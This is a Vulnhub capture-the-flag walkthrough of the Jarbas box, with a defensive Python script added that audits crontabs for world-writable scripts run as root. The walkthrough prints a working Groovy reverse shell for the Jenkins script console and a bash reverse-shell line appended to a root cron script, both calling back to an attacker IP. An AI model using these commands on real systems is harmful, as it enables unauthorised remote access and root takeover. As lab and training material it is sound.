Jarbas: 1 | Vulnhub Walkthrough
Jarbas is a beginner-friendly CTF challenge created by Tiago Tavares and hosted on Vulnhub. Tiago has also designed another entry-level box named Lampião, which was equally fun.
Level: Beginner
I started with an arp-scan to identify the target IP address. Nmap scans looked promising, with apparently two web applications (on ports 80 and 8080), a MySQL service (3306) and SSH (22).
Enumeration and Initial Foothold
The application on port 80 was some bizarre-looking search engine with no functional links. On port 8080, there was a Jenkins console which looked interesting. I launched a full brute-force attack on the console using the Metasploit module with a custom word-list created using cewl and John the Ripper, assuming the username was admin. Sometimes overconfidence just hurts!
I wasted almost an hour before understanding that I needed to perform further enumeration. The exposed MySQL port was not accepting any remote connections.
Before running my brute-force attack I had fired up one round of dirb and nikto, finding nothing of interest. Later, after the useless attempt to brute-force my way in, I launched dirb with bigger word-lists, again with no luck. Then I thought of playing around with file extensions.
dirb http://192.168.56.101/ /usr/share/wordlists/dirb/big.txt -X .txt,.html
Access.html was all I needed; it had three password hashes with usernames. I used hash-identifier to quickly confirm that the hashes were indeed MD5, then pasted them into crackstation.net. Generally I prefer to try online tools before starting an offline cracking attempt.
Three out of three! That’s a good omen. However, out of the three, only the last pair was working. I logged into Jenkins as Eder Luis.
eder: vipsu
Many Hidden (Not-So-Hidden) Secrets of Jenkins
Jenkins is an automation server used to automate the software development life cycle (SDLC). It is a very powerful automation tool and a common product in many firms. I have seen at least 3–4 instances of Jenkins in real-world pentests.
Jenkins has a built-in script console which runs Groovy code. Apache Groovy is a newer-generation JVM language, syntactically the twin brother of Java. I am no expert in lecturing on how Groovy differs from or resembles Java, but I know that the Java reverse shell one-liner from pentestmonkey works fine with Jenkins!
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.56.102/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
I got a really messed-up shell which repeats every word I type :/
Path to Root
During my enumeration, I found a cron job entry for a cleaning script running as root. To my further excitement, I found that the script was writable by all users. I just appended a reverse shell command to the cleaning script and waited for the root shell.
echo "0<&196;exec 196<>/dev/tcp/192.168.56.102/4445; /bin/bash <&196 >&196 2>&196" >> /etc/script/CleaningScript.sh
Within two or three minutes I got a connection back. The flag can be read from /root/flag.txt.
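As an added defensive check (not part of the original write-up), this Python script audits a system crontab for the exact misconfiguration used above: a job, typically root's, whose script is writable by everyone. It parses /etc/crontab-style job lines, flags any absolute path in a job's command that "other" can modify or replace, and runs against a constructed sample; the cron entries, script names and temporary paths are constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# System crontab job line: five time fields or @keyword, then user, then command.
_JOB = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.+)$")

def parse_crontab(text):
    """Yield (user, command) per job line, skipping comments and VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"\w+=", line):
            continue
        m = _JOB.match(line)
        if m:
            yield m.group(1), m.group(2)

def replaceable_by_others(path):
    """True if 'other' can write the file, or swap it via a loose parent dir."""
    try:
        st = os.stat(path)
    except OSError:
        return False  # dangling reference: not this check's concern
    if st.st_mode & stat.S_IWOTH:
        return True
    parent = os.stat(os.path.dirname(path) or "/").st_mode
    return bool(parent & stat.S_IWOTH) and not parent & stat.S_ISVTX  # no sticky bit

def audit_crontab(path):
    """Return [(user, script)] for job paths an unprivileged user could edit."""
    with open(path) as fh:
        jobs = list(parse_crontab(fh.read()))
    return [(user, tok) for user, cmd in jobs for tok in cmd.split()
            if tok.startswith("/") and replaceable_by_others(tok)]

def demo():
    """Constructed sample: a root job on a 0777 script next to a 0755 one."""
    tmp = tempfile.mkdtemp()
    for name, mode in (("CleaningScript.sh", 0o777), ("backup.sh", 0o755)):
        with open(os.path.join(tmp, name), "w") as fh:
            fh.write("#!/bin/bash\necho cleaning\n")  # constructed script body
        os.chmod(os.path.join(tmp, name), mode)
    crontab = os.path.join(tmp, "crontab")
    with open(crontab, "w") as fh:
        fh.write("SHELL=/bin/bash\n# constructed sample crontab\n"
                 f"*/5 * * * * root {tmp}/CleaningScript.sh\n"
                 f"0 3 * * * root /bin/sh {tmp}/backup.sh\n")
    return audit_crontab(crontab)  # only the 0777 script is reported
```

Running `audit_crontab` over /etc/crontab and each file in /etc/cron.d on a real host surfaces the same weakness before an attacker does; the fix is to make the script root-owned and mode 0755 or stricter.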
Jarbas is a beginner-level challenge with not many twists. There was another user, Eder, on the box, with an entry in /etc/passwd. If the privilege escalation scenario had involved multiple escalations through Eder, it would have been more fun.